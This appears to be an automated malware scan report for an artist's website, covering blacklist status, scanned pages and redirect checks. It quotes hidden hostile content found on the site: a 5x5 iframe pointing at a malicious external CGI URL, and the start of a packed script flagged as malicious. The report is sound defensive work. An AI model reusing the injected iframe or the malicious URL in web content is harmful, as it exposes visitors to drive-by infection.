Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=garettbrennan.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://garettbrennan.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://garettbrennan.com/ | 200 OK Content-Length: 20247 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.threepin.org <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <title>Garett Brennan :: Official Artist Page :: Home</title> <meta name="description" content="" />...[4210 bytes skipped]... | ||
http://garettbrennan.com/updates/concrete5.5.2.1/concrete/js/jquery.js?v=1fd0ac8b8a3af203f29daaf9a69683d6 | 200 OK Content-Length: 93866 Content-Type: application/javascript | clean |
http://garettbrennan.com/updates/concrete5.5.2.1/concrete/js/ccm.base.js?v=1fd0ac8b8a3af203f29daaf9a69683d6 | 200 OK Content-Length: 2450 Content-Type: application/javascript | clean |
http://garettbrennan.com/packages/theme_garett_brennan/blocks/gallery/templates/garett_brennan/js/jquery.lightbox-0.5.pack.js?v=1fd0ac8b8a3af203f29daaf9a69683d6 | 200 OK Content-Length: 6451 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(6($){$.2N.3g=6(4){4=23.2H({2B:\'#34\',2g:0.8,1d:F,1M:\'18/5-33-Y.16\',1v:\'18/5-1u-2Q.16\',1E:\'18/5-1u-2L.16\',1W:\'18/5-1u-2I.16\',19:\'18/5-2F.16\',1f:10,2A:3 Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://garettbrennan.com/files/4713/2345/2750/capo.jpg | 200 OK Content-Length: 44599 Content-Type: image/jpeg | clean |
http://garettbrennan.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://garettbrennan.com/files/4613/2345/2744/bus_writing.jpg | 200 OK Content-Length: 64637 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/5013/2345/2756/GB_JW.jpg | 200 OK Content-Length: 86063 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/1213/2345/2766/jan_tour.jpg | 200 OK Content-Length: 67634 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/3913/2345/2761/GSL_OCT.jpg | 200 OK Content-Length: 119897 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/9113/2345/2735/bubba_GB.jpg | 200 OK Content-Length: 71531 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/9812/9196/4607/cookie_studio.jpg | 200 OK Content-Length: 147767 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/5912/8596/1905/image1.jpg | 200 OK Content-Length: 128175 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/6312/8631/7900/10062271141_dnzjn.jpg | 200 OK Content-Length: 55735 Content-Type: image/jpeg | clean |
http://garettbrennan.com/files/3212/8631/3214/10061259516_X3bBg.jpg | 200 OK Content-Length: 67207 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: garettbrennan.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 22 Dec 2014 07:15:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Length: 20247
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: CONCRETE5=CsV9mzb5eqcssbx2WywHx2; path=/
...20247 bytes of data.
GET / HTTP/1.1
Host: garettbrennan.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 22 Dec 2014 07:15:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Length: 20247
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: CONCRETE5=CsV9mzb5eqcssbx2WywHx2; path=/
...20247 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: garettbrennan.com
Referer: http://www.google.com/search?q=garettbrennan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: garettbrennan.com
Referer: http://www.google.com/search?q=garettbrennan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.